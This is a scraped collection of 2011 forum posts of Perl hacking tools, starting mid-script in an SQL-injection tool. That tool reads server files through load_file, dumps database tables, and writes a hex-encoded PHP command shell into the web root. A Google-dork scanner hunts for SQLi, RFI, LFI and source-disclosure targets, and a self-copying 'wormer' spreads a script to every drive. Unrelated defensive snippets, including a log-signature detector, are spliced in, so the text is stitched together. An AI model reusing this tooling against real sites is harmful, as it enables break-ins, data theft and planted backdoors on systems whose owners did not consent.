print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@buscar3) {
chomp $file;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass2);
if ($code =~/ERTOR854(.*)ERTOR854/g) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}

sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub finish {
&copyright;
<STDIN>;
exit(1);
}


sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}

#blog : doddy-hackman.blogspot.com
#contact : lepuke[at]hotmail[Com]
#The end



If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/k0bra/

Perl / [Perl] G00gl3nator By Doddy H
July 03, 2011, 09:45:53 PM
Well, this is the scanner in its graphical version; this program can scan

  • SQLI
  • RFI
  • LFI
  • Full Source Disclosure

    You can also search Google for strings; the results
    are saved in a folder that the program creates when it runs

    Code: perl

    #!usr/bin/perl
    #Googlenator (C) Doddy Hackman 2011

    use Tk;
    use Tk::ROText;
    use Tk::FileSelect;
    use URI::Split qw(uri_split);
    use Cwd;
    use WWW::Mechanize;

    if ($^O eq 'MSWin32') {
    use Win32::Console;
    Win32::Console::Free();
    }

    my $nave = WWW::Mechanize->new(autocheck => 0);
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

    installer();

    my $new = MainWindow->new(-background=>"black");

    $new->title("Googlenator (C) Doddy Hackman 2011");
    $new->geometry("780x530");
    $new->resizable(0,0);

    $d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
    my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
    my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
    $d->pack(-side=>"top",-fill=>"x");

    $scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
    $scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
    $scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
    $scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);

    $logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
    $logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
    $logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
    $logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
    $logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);

    my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
    head();

    $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

    my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

    $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

    my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

    $new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

    my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

    $new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
    $new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
    $new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");

    MainLoop;

    head();

    sub googler {

    my $google = $google->get;
    my $pages = $pages->get;
    my $dorks = $dorks->get;

    head();

    $box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

    my @webas = google($google,$dorks,$pages);

    $box->insert("end","\t\t[+] Cleaning\n\n");
    $box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

    for(@webas) {
    $new->update();
    $box->insert("end","\t\t[Link] : ".$_."\n");
    savefile($dorks.".txt",$_);
    }

    $box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
    $box->insert("end","\t\t[+] Finished\n\n");

    }

    sub loadsql {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scansql($page);
    }

    sub scansql {
    my ($pass1,$pass2) = ("+","--");
    my $page = shift;
    $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    if ($code1=~/The used SELECT statements have a different number of columns/ig) {
    $box->insert("end","\t\t[+] SQLI : $page\n");
    savefilevul("sql-logs.txt",$page);
    }}}

    sub loadrfi {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scanrfi($page);
    }

    sub scanrfi {
    my $page = shift;
    $code1 = toma($page."http:/www.supertangas.com/");
    if ($code1=~/Los mejores TANGAS de la red/ig) { #This is real knowledge xDDD
    $box->insert("end","\t\t[+] RFI : $page\n");
    savefilevul("rfi-logs.txt",$page);
    }}}

    sub loadlfi {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scanlfi($page);
    }


    sub scanlfi {
    my $page = shift;
    $code1 = toma($page."'");
    if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
    $box->insert("end","\t\t[+] LFI : $page\n");
    savefilevul("lfi-logs.txt",$page);
    }}}

    sub loadfsd {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scanfsd($page);
    }

    sub scanfsd {
    my $page = shift;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
    if ($path=~/\/(.*)$/) {
    my $me = $1;
    $code1 = toma($page.$me);
    if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
    $box->insert("end","\t\t[+] Full Source Discloure : $page\n");
    savefilevul("fsd-logs.txt",$page);
    }}}}

    sub head {

    $box->delete("0.0","end");

    $box->insert("end","
               @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@ 
              @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@
             @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@
             @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@ 
             @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@ 
              @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@
               @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@




    ");
    }

    sub about {
    $about = MainWindow->new(-background=>"black");
    $about->title("Googlenator v0.3");
    $about->geometry("300x110");
    $about->resizable(0,0);
    $about->Label(-background=>"black",-foreground=>"cyan")->pack();
    $about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
    $about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
    $about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
    }

    sub exitx {
    exit(1);
    }

    sub savefilevul {
    open (SAVE,">>logs/vulz/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub toma {
    return $nave->get($_[0])->content;
    }

    sub dame_link {
    return $nave->find_all_links();
    }

    sub clean {
    if ($_[0] =~/\=/) {
    my @sacar= split("=",$_[0]);
    return(@sacar[0]."=");
    }
    }

    sub savefile {
    open (SAVE,">>logs/search/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub google {

    for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
    $new->update();
    toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
    @links = dame_link();
    for my $l(@links) {
    if ($l->url() =~/webcache.googleusercontent.com/) {
    push(@url,$l->url());
    }
    }
    }

    for(@url) {
    if ($_ =~/cache:(.*?):(.*?)\+/) {
    push(@founds,$2);
    }
    }

    my @founds = repes(@founds);

    return @founds;
    }


    sub installer {

    unless (-d "logs/") {
    mkdir("logs/","777");
    mkdir("logs/search","777");
    mkdir("logs/vulz","777");
    }
    }

    sub repes {
    foreach my $palabra ( @_ ) {
    next if $repety{ $palabra }++;
    push @revisado,$palabra;
    }
    return @revisado;
    }

    sub loadgoogle {
    system("start ".getcwd()."/logs/search/");
    }

    sub loadfilesql {
    system("start logs/vulz/sql-logs.txt");
    }


    sub loadfilelfi {
    system("start logs/vulz/lfi-logs.txt");
    }


    sub loadfilerfi {
    system("start logs/vulz/rfi-logs.txt");
    }


    sub loadfilefsd {
    system("start logs/vulz/fsd-logs.txt");
    }

    # ¿ The End ?
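A defensive counterpart to the k0bra scanner above and to Googlenator's scansql probe, added here as an example and not part of either post: a Python access-log scanner that flags the literal query-string pieces both scripts build their requests from (the order by probe, union select 666, the char() column markers, information_schema, load_file, into outfile) plus k0bra's User-Agent quirk. The Apache combined log format, the addresses and the log lines are all constructed.

```python
"""Flag, in web-server access logs, the probe strings that the k0bra and
Googlenator scripts concatenate into the query string.  Added example, not
code from the posts; the log format and every log line here are constructed."""
import re
from urllib.parse import unquote_plus

# Apache "combined" log format is assumed; only ip, target and ua are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (name, regex) pairs applied to the decoded, lower-cased request target.
# Each pattern is a literal fragment taken from the two scripts' payloads.
SIGNATURES = [
    # k0bra sub length: "1 and 1=0 order by9999999999" (no space, as posted)
    ("orderby_probe", re.compile(r"\border\s+by\s*9{6,}")),
    # k0bra sub length and Googlenator scansql: "union select 666"
    ("union_select_probe", re.compile(r"\bunion\s+select\s+666\b")),
    # RATSXPDOWN column marker spelled as char(82,65,84,83,88,80,68,79,87,78,...)
    ("char_marker", re.compile(r"char\(82,65,84,83,88,80,68,79,87,78")),
    # ERTOR854 marker: char(69,82,84,79,82,56,53,52)
    ("ertor_marker", re.compile(r"char\(69,82,84,79,82,56,53,52\)")),
    ("unhex_hex_concat", re.compile(r"unhex\(hex\(concat\(")),
    ("information_schema",
     re.compile(r"\bfrom\s+information_schema\.(?:tables|columns|schemata)\b")),
    ("mysql_user", re.compile(r"\bfrom\s+mysql\.user\b")),
    ("load_file", re.compile(r"\bload_file\(")),
    ("into_outfile", re.compile(r"\binto\s+outfile\b")),
]

# k0bra's $nave->agent(...) string has no space before "Firefox"; a cheap
# client fingerprint (Googlenator's agent string does have the space).
K0BRA_UA = "Gecko/20080201Firefox/2.0.0.12"


def normalize_target(target):
    """URL-decode (+ and %xx), fold the /**/ bypass into a space, lower-case."""
    return unquote_plus(target).replace("/**/", " ").lower()


def inspect_line(line):
    """Return a hit record for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparsable line; in production, count these too
    target = normalize_target(m["target"])
    hits = [name for name, rx in SIGNATURES if rx.search(target)]
    if K0BRA_UA in m["ua"]:
        hits.append("k0bra_user_agent")
    if not hits:
        return None
    return {"ip": m["ip"], "status": m["status"],
            "path": m["target"].split("?", 1)[0], "signatures": hits}


def scan_log(text):
    """Run inspect_line over every line; hits come back in log order."""
    return [h for h in (inspect_line(ln) for ln in text.splitlines()) if h]


def hits_per_ip(hits):
    """Count hits per source IP: k0bra's enumeration loops (one request per
    column or LIMIT offset) show up as a burst from a single address."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


# Constructed sample log (RFC 5737 addresses); the first line is benign.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jul/2011:21:39:55 -0300] "GET /news.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/5.0"
203.0.113.5 - - [03/Jul/2011:21:40:01 -0300] "GET /news.php?id=1+and+1=0+order+by9999999999-- HTTP/1.1" 200 1834 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
203.0.113.5 - - [03/Jul/2011:21:40:02 -0300] "GET /news.php?id=1/**/and/**/1=0/**/union/**/select/**/666/* HTTP/1.1" 200 1910 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
203.0.113.5 - - [03/Jul/2011:21:40:03 -0300] "GET /news.php?id=1+and+1=0+union+select+char(82,65,84,83,88,80,68,79,87,78,49,82,65,84,83,88,80,68,79,87,78),char(82,65,84,83,88,80,68,79,87,78,50,82,65,84,83,88,80,68,79,87,78) HTTP/1.1" 200 2044 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
203.0.113.5 - - [03/Jul/2011:21:40:09 -0300] "GET /news.php?id=-1+union+select+unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49)))),2,3+from+information_schema.tables+limit+17,1-- HTTP/1.1" 200 2101 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
203.0.113.5 - - [03/Jul/2011:21:41:30 -0300] "GET /news.php?id=-1%20union%20select%200x414243,2,3%20into%20outfile%20'/var/www/html/x.php'%00 HTTP/1.1" 200 1602 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
192.0.2.44 - - [03/Jul/2011:21:52:10 -0300] "GET /item.php?id=-1+union+select+666-- HTTP/1.1" 200 1399 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(hit["ip"], hit["path"], ",".join(hit["signatures"]))
    print(hits_per_ip(found))
```

The cleanest mitigation for everything these signatures detect is still at the application: parameterised queries, display_errors off (the scanners key on leaked MySQL error text), and no FILE privilege for the web application's database user.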
Perl / [Perl] Function writeword()
July 03, 2011, 09:45:38 PM
Hi, with this function you can launch Word and write whatever text you want, very
useful if you want to make a virus

Code: perl

#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

sub loadword {

system("start winword.exe");

sleep 4;

SendKeys($_[0]);

}


Usage example

Code: perl

loadword("Hola a todos");

Perl / [Perl] Function wormer()
July 03, 2011, 09:45:25 PM
With this function you can replicate a file to every available drive

Code: perl

#ascii chr(65) = A | chr(90) = Z
#By Doddy H

use File::Copy;

sub wormear {
for my $dir(65..90) {
copy($0,chr($dir).":/");
}
}


Usage example

Code: perl


wormear($0);

Perl / [Perl] Function Speak()
July 03, 2011, 09:45:15 PM
Hi everyone, with this simple function we will get our computer to talk and
say whatever we want, although it can only speak well in English

Code: perl

#By Doddy H

use Win32::OLE;

sub speak {


my $habla = Win32::OLE->new("SAPI.SpVoice");

$habla->Speak($_[0],0);

}


Usage example

Code: perl

speak("Hi brother");

Perl / [Perl] Function screensave()
July 03, 2011, 09:45:05 PM
Hi everyone.

With this function you can take a screenshot of the system

Code: perl


#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

capture_window();

sub capture_window {

SendKeys("%{PRTSCR}");

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">foto.bmp");
binmode(FOTO);
print FOTO $a;
close FOTO;

}


Usage example

Code: perl

capture_window()


And you will have the screenshot saved under the name foto.bmp
Perl / [Perl] Function savefile()
July 03, 2011, 09:44:43 PM
Hi, with this function you can create a file and write to it.
If the file already exists it only appends and does not delete it

Code: perl

#By Doddy H
sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE;
}


Usage example

Code: perl

savefile("C:\\Windows\\Logs\\file.txt","hola")

Perl / [Perl] Function printear()
July 03, 2011, 09:44:33 PM
Hi everyone, today I bring you a function to
use colours in Perl for the text we want to display

Code: perl

#By Doddy H

use Color::Output;
Color::Output::Init;

sub printear {
if ($_[1] eq "text") {
cprint("\x03".$_[2].$_[0]."\x030\n");
}
elsif ($_[1] eq "stdin") {
if ($_[3] ne "") {
cprint("\x03".$_[2].$_[0]."\x030"."\x03".$_[3]);
my $op = <stdin>;
chomp $op;
cprint ("\x030");
return $op;
}
}
else {
print "error\n";
}
}


Syntax

Code: perl

printear("text","text/stdin","color text","color output")


Usage examples

With plain text

Code: perl

printear("hola","text","10","5");


Text with keyboard input

Code: perl

my $d  = printear("nombre : ","stdin","6","2");
print "pusiste $d\n";

Perl / [Perl] Function movewin()
July 03, 2011, 09:44:23 PM
Well, with this function you can drive a window crazy so
that it moves in evil ways

Code: perl

#By Doddy H
use Win32::API;

sub movewin {
for my $n(1..20) {
# SetWindowPos takes 7 parameters (hWnd,hWndInsertAfter,X,Y,cx,cy,uFlags); the prototype must list all 7
Win32::API->new("user32","SetWindowPos",[qw(N N N N N N N)],'N')->Call($_[0],$n,$n,$n,$n,$n,$n);
}
}



Usage example

Code: perl

movewin(id ventana);
Perl / [Perl] Function killprocess()
July 03, 2011, 09:44:12 PM
Hi everyone, here I bring you a function to
close the process you hate by giving its name and pid

Código: perl

use Win32::Process;

# killprocess(name, pid): terminates the process with the given PID.
# Win32::Process::KillProcess takes (pid, exit_code); the name is kept only
# for the caller's reference (the original passed it as the exit code).
sub killprocess {
    my ($name, $pid) = @_;
    if (Win32::Process::KillProcess($pid, 0)) {
        return 1;
    } else {
        # the bareword "false" used originally is a non-empty string, i.e. true
        return 0;
    }
}


Usage example

Código: perl

if (killprocess("deamon.exe","4052")) {
print "chau\n\a";
}
#355
Perl / [Perl] Function hideit()
July 03, 2011, 09:43:57 PM
With this function you can hide or show hidden files/directories
on Windows

Código: perl

#By Doddy H
use Win32::File;   # exports the attribute constants NORMAL and HIDDEN

# hideit(path, "show"|"hide")
sub hideit {
    my ($path, $mode) = @_;
    if ($mode eq "show") {
        # NORMAL replaces the whole attribute set, so it also clears READONLY, etc.
        Win32::File::SetAttributes($path, NORMAL);
    }
    elsif ($mode eq "hide") {
        Win32::File::SetAttributes($path, HIDDEN);
    }
    else {
        print "error\n";
    }
}


Usage example, show/hide

Código: perl

hideit("test.pl","show");


#356
Perl / [Perl] Function getprocess()
July 03, 2011, 09:43:46 PM
Hi, here I bring you a function that will show you the
processes on your computer

Código: perl

use Win32::OLE qw(in);

# getprocess(): returns a hash of process name => PID taken from WMI.
# Note that the name is the key, so several processes with the same name
# keep only the last PID seen.
sub getprocess {

    my %procesos;

    my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
    my $dos = $uno->ConnectServer("", "root\\cimv2");

    foreach my $pro (in $dos->InstancesOf("Win32_Process")) {
        $procesos{$pro->{Caption}} = $pro->{ProcessId};
    }
    return %procesos;
}


Usage example

Código: perl

my %vida = getprocess();

for my $data(keys %vida) {
print "[Proceso] : ".$data."\n";
print "[PID] : ".$vida{$data}."\n\n";
}
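A deeper version of the process listing, added here as an example and not code from the original post: it keys the table by PID, so two processes with the same name do not overwrite each other (which happens when Caption is the key), and adds a check that a PID still belongs to the expected image name, the check a caller of a kill-by-PID function would want before acting. It assumes Win32::OLE on Windows; the PID and name at the bottom are constructed values.

```perl
#!/usr/bin/perl
# Added example, not from the original post: process inventory via WMI keyed
# by PID, plus a check that a PID still belongs to the expected image name.
use strict;
use warnings;
use Win32::OLE qw(in);

# Returns a hash: PID => { name, path, parent }
sub get_process_table {
    my %table;
    my $locator = Win32::OLE->new("WbemScripting.SWbemLocator")
        or die "Cannot create SWbemLocator: " . Win32::OLE->LastError();
    my $wmi = $locator->ConnectServer("", "root\\cimv2")
        or die "Cannot connect to WMI: " . Win32::OLE->LastError();
    for my $p (in $wmi->InstancesOf("Win32_Process")) {
        $table{ $p->{ProcessId} } = {
            name   => $p->{Caption},
            path   => $p->{ExecutablePath},    # undef for kernel/system processes
            parent => $p->{ParentProcessId},
        };
    }
    return %table;
}

# True only when $pid is in the table and its image name is $name
# (case-insensitive). PIDs are reused, so call this right before acting.
sub pid_matches_name {
    my ($pid, $name, $table) = @_;
    return 0 unless exists $table->{$pid};
    return lc($table->{$pid}{name}) eq lc($name) ? 1 : 0;
}

my %procs = get_process_table();
for my $pid (sort { $a <=> $b } keys %procs) {
    printf "%6d  %-28s parent=%-6d %s\n", $pid, $procs{$pid}{name},
        $procs{$pid}{parent} // 0, $procs{$pid}{path} // "";
}

# Constructed values: replace with a real PID/name pair before use
my ($pid, $expected) = (4052, "notepad.exe");
if (pid_matches_name($pid, $expected, \%procs)) {
    print "PID $pid is $expected\n";
} else {
    print "PID $pid is not $expected (or no longer exists)\n";
}
```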
#357
Perl / [Perl] Function getmyip()
July 03, 2011, 09:41:33 PM
Hi everyone.

Here I leave you a function I made to find out
our IP without needing to use web pages with that annoying
online service

Código: perl

#By Doddy H
use Socket qw(inet_ntoa);
use Sys::Hostname qw(hostname);

# Returns the IPv4 address the local host name resolves to (the LAN address,
# not the public address a remote web service would see).
# gethostbyname("") in the original only works on some platforms.
sub get_ip {
    my $packed = gethostbyname(hostname()) or return undef;
    return inet_ntoa($packed);
}


Usage example

Código: perl

print get_ip();
#358
Perl / [Perl] Function getlink()
July 03, 2011, 09:41:22 PM
Hi, I bring you a function to search for
links on a web page

Código: perl

use HTML::LinkExtor;

# get_links(html): returns every link attribute value (href, src, ...)
# found in the document. The original relied on the globals $code and
# @links; here the HTML is a parameter and the list is local to the call.
sub get_links {
    my ($code) = @_;
    my @links;

    # the callback receives the tag name and its link-carrying attributes
    my $parser = HTML::LinkExtor->new(sub {
        my ($tag, %attr) = @_;
        push(@links, values %attr);
    });
    $parser->parse($code);
    $parser->eof;

    return @links;
}



Usage example

Código: perl

use LWP::Simple;

my $code = get("http://127.0.0.1/doddy/index.php");

my @ver = get_links($code);

for my $url (@ver) {
    print $url."\n";
}
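A generalisation of the link extractor, added here as an example and not code from the original post: relative links (the usual case on a real page) are resolved against the page URL with the URI module, each absolute URL is reported once, and the tag and attribute it came from are kept. It assumes HTML::LinkExtor and URI are installed; the HTML document is a constructed sample standing in for the fetched index.php.

```perl
#!/usr/bin/perl
# Added example, not from the original post: extract links from HTML and
# resolve relative ones against the page URL, returning absolute URLs once each.
use strict;
use warnings;
use HTML::LinkExtor;
use URI;

# get_links_absolute(html, base_url): list of [tag, attribute, absolute_url]
sub get_links_absolute {
    my ($html, $base) = @_;
    my (@links, %seen);
    my $parser = HTML::LinkExtor->new(sub {
        my ($tag, %attr) = @_;           # only link-carrying attributes arrive here
        for my $name (sort keys %attr) {
            my $abs = URI->new_abs($attr{$name}, $base)->as_string;
            push @links, [$tag, $name, $abs] unless $seen{$abs}++;
        }
    });
    $parser->parse($html);
    $parser->eof;                        # flush anything still buffered
    return @links;
}

# Constructed sample page standing in for the fetched index.php
my $html = <<'HTML';
<html><body>
<a href="/login.php">Login</a>
<a href="about.html">About</a>
<img src="img/logo.png">
<a href="http://example.org/">external</a>
<a href="/login.php">Login again</a>
</body></html>
HTML

for my $link (get_links_absolute($html, "http://127.0.0.1/doddy/index.php")) {
    printf "%-4s %-5s %s\n", @$link;
}
```

The duplicate "/login.php" is reported once, "about.html" and "img/logo.png" are resolved under /doddy/, and the external URL is left as it is.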
#359
Perl / [Perl] Function getdrive()
July 03, 2011, 09:41:09 PM
With this function you can get the drive it is currently
running on (c:/ or whichever it is)

Código: perl

#By Doddy H
use Cwd;

# Returns the drive of the current working directory as "X:/", or undef
# when the path has no drive prefix (for example on Unix)
sub getdrive {

    my $path = getcwd();

    # a single letter followed by ":" at the start of the path
    if ($path =~ /^([A-Za-z]):/) {
        return $1 . ":/";
    }
    return undef;

}


Usage example

Código: perl

print getdrive();

#360
Perl / [Perl] Function download()
July 03, 2011, 09:40:55 PM
Hi, here I bring you a function to download
files

Código: perl

#!/usr/bin/perl
#Simple downloader in Perl
#By Doddy H

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
$nave->timeout(5);

# download(url, file): returns 1 when the file was fetched and exists on disk.
# mirror() always returns an HTTP::Response object (always "true"), so the
# status has to be checked; 304 means the local copy is already up to date.
sub download {
    my $res = $nave->mirror($_[0], $_[1]);
    if (($res->is_success || $res->code == 304) && -f $_[1]) {
        return 1;
    }
    return 0;
}


Syntax

Código: text

download(url to fetch, file name to save it under);


Usage example

Código: perl

if (download("http://127.0.0.1/bones.rar","bones.rar")) {
print "[+] file downloaded\n";
}
